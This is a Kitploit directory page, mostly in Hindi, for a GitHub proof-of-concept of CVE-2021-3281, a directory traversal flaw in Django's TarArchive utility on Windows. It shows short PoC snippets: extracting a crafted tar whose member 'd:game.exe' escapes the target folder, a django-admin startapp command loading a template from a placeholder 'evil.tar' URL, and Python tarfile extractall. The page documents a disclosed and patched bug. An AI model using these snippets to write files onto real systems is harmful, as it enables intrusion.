Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-3281 — CVE-2021-3281 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Django के TarArchive उपयोगिता में निर्मित tar फ़ाइलों के माध्यम से डायरेक्टरी ट्रैवर्सल भेद्यता, Python tarfile मॉड्यूल प्रदर्शन के साथ। | Kitploit
उपकरण/GitHubGitHub/lwzsoviet/cve-2021-3281
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHublwzsoviet/cve-2021-3281

CVE-2021-3281

CVE-2021-3281 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Django के TarArchive उपयोगिता में निर्मित tar फ़ाइलों के माध्यम से डायरेक्टरी ट्रैवर्सल भेद्यता, Python tarfile मॉड्यूल प्रदर्शन के साथ।

रिपॉजिटरी देखें
215 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-3281

django.utils.archive.py, lineno:171, में TarArchive वर्ग में एक डायरेक्टरी ट्रैवर्सल भेद्यता है।

फ़ंक्शन कॉल os.path.join(to_path, name) ने पैरामीटर "name" की जाँच नहीं की, यदि कोई इस उपयोगिता का उपयोग Windows प्लेटफ़ॉर्म पर करता है, तो डायरेक्टरी ट्रैवर्सल का जोखिम होगा, POC है:

root@kitploit:~
from django.utils import archive
archive.extract('test.tar','.')
The test.tar include file named "d:game.exe",and the poc will create a file named "game.exe" in D://game.exe rather than "."
It looks like the Django core didn't use this util,but I still think it's a risk,maybe someone will use this util in webapp to archive somethings.``and there is another scene:``"djangoadmin startapp --template" command will use archive.py,see in https://docs.djangoproject.com/en/3.1/ref/django-admin/#s-startapp. POC is:

django-admin.exe startapp vulapp --template="C:/my_templates/test.tar"
It'll create a file named "game.exe" in D://game.exe rather than "vulapp/", It also accept URLs like "django-admin.exe startapp vulapp --template=https://xxx.com/evil.tar"

POC

root@kitploit:~
from django.utils import archive
archive.extract('test.tar','.')

Python/Lib/tarfile.py में भी यही समस्या है:

root@kitploit:~
#Lib/tarfile.py:
import tarfile
tar=tarfile.open('test.tar','r')
tar.extractall('.')
tar.close()

और दस्तावेज़ एक चेतावनी देता है, देखें https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

लिंक

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3281

https://www.djangoproject.com/weblog/2021/feb/01/security-releases/

टूल डाउनलोड करें